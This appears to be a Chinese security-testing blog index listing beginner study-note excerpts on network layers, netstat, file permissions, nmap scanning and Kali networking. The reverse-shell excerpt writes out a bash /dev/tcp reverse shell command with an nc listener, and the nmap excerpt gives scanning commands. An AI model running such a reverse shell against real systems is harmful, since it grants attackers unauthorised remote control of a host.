随笔分类 -  安全测试

四层协议网络传输
摘要:概述 四层协议传输过程分为应用层、传输层、网络层、数据链路层,自上而下每经过一层都会增加一个首部。与三次握手的关系:四层协议的发送端、接收端完整流程涵盖三次握手,但四层协议是请求到发送数据阶段 发送端处于于三次握手的第一阶段。 详情 应用层:客户端发起一个请求,如http、smtp、telnet、d 阅读全文

posted @ 2020-01-26 15:55 喝了少不如不喝 阅读(1571) 评论(0) 推荐(0)

网络状态查看理解
摘要:一、常用网络命令: netstat netstat -ntlp netstat -anop|grep ssh netstat -anop|grep 22 netstat -anop|grep MysqlPort |wc -l netstat -i netstat -r service ssh sto 阅读全文

posted @ 2019-12-20 14:17 喝了少不如不喝 阅读(544) 评论(0) 推荐(0)

反弹shell理解
摘要:靶机 bash -i >& /dev/tcp/[ip]/[port1] 0>&1 攻击机 nc -vvlp [port1] 靶机中把 >&输成 > & 导致>和&之间有空格不能被执行此命令。对linux文件的重定向和文件描述命令理解不深入。linux中一切接文件理解。 现在初学还只是搬运工,后续随着 阅读全文

posted @ 2019-12-18 11:11 喝了少不如不喝 阅读(102) 评论(0) 推荐(0)

文件权限
摘要:1 目录类型 2-4 文件所有者权限(谁创建的文件或目录谁就是这个文件或目录的所有者者) 5-7 用户组权限 8-10 其他用户组权限 11 .这里与SELinux有关目前不必关注 可以用数字代替权限: 例:chmod 755 adm 代表文件所有者权限是读、写、执行;当前用户组权限读、执行权限;其 阅读全文

posted @ 2019-12-17 10:04 喝了少不如不喝 阅读(130) 评论(0) 推荐(0)

nmap基本命令使用
摘要:nmap 是主机探测、端口扫描、版本检测、系统检测、支持探测脚本编写。查看那个端口和开着啥 telnet 8.8.8.8 可以查看ip nmap ip -p<port> 根据常用服务猜测他的端口,查看ip端口有没有开启 nmap -p50-100 ip 查看端口范围 nmap -O ip 操作系统检 阅读全文

posted @ 2019-12-11 20:26 喝了少不如不喝 阅读(270) 评论(0) 推荐(0)

kali机获取不到ip地址解决
摘要:kali ip 阅读全文

posted @ 2019-12-11 14:52 喝了少不如不喝 阅读(4368) 评论(0) 推荐(0)

导航